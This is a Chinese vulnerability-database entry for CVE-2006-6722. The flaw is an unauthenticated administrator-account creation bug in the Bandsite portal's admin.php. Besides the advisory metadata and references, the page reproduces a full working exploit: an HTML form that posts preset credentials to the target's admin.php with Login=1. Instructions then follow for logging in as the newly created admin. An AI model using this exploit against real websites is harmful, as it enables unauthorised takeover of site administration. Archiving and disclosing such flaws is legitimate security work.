Bandwebsite 'admin.php'未授权管理员账户创建漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111782 漏洞类型 设计错误
发布时间 2006-12-16 更新时间 2007-01-02
CVE编号 CVE-2006-6722 CNNVD-ID CNNVD-200612-505
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2938
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-505
|漏洞详情
Bandwebsite(Bandsite门户系统)1.5远程攻击者通过以登录参数设置为1的对admin.php的直接请求来创建管理员账户。
|漏洞EXP
<!--
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php 
- Author  : H0tTurk-

WebSiteVersion:1.x 
 - Problem : Admin Added Access.

Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more.
-->

      <TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
        <TBODY>
        <tr><td bgcolor=#ffffff>
 </p>
<p>
<form action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins method=post>
   Name:<br>
<input type=text name='name' value='hotturk' size="20"><br>
   Pass:<br>
<input type=text name='pass' value='hotturk' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>

<!--
Admin Added :)
http://[target]/bandwebsite/login.php
and login as admin 
name :hotturk
pass : hotturk

--------------------------------------------------------
Special Thx: Dr.Max.Virus,GencTurk,Str0ke,SawTurk,Chironex Fleckeri,Unique-key,KurtEfendy,MadConfig,R4zor,Arabian-FighterZ,And Ayyildiz ViP Soldiers 
                                       "BUNDAN OTESÝ YA ÝSTÝKLAL YA OLUM"
-->

# milw0rm.com [2006-12-16]
|参考资料

来源:XF
名称:bandsite-admin-security-bypass(30921)
链接:http://xforce.iss.net/xforce/xfdb/30921
来源:MISC
链接:http://www.securityfocus.com/data/vulnerabilities/exploits/21625.html
来源:BID
名称:21625
链接:http://www.securityfocus.com/bid/21625
来源:MILW0RM
名称:2938
链接:http://www.milw0rm.com/exploits/2938
来源:MILW0RM
名称:2938
链接:http://milw0rm.com/exploits/2938